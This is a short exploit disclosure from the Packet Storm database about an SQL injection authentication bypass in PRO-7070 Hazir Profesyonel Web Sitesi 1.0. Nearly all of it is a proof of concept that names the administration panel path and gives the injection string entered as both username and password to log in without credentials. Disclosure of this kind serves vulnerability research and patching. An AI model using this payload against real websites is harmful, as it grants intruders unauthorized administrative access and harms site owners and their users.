PRO-7070 Hazir Profesyonel Web Sitesi 1.0 SQL Injection

2019-12-09T00:00:00
ID PACKETSTORM:155597
Type packetstorm
Reporter Ahmet Umit Bayram
Modified 2019-12-09T00:00:00

Description

                                        
                                            `# Exploit Title: PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass  
# Date: 2019-12-08  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://www.websitem.biz/hazir-site/pro-7070-hazir-mobil-tablet-uyumlu-web-sitesi  
# Tested on: Kali Linux  
# Version: 1.0  
# CVE: N/A  
  
----- PoC: Authentication Bypass -----  
  
Administration Panel: http://localhost/[PATH]/yonetim/pass.asp  
Username: '=' 'or'  
Password: '=' 'or'  
`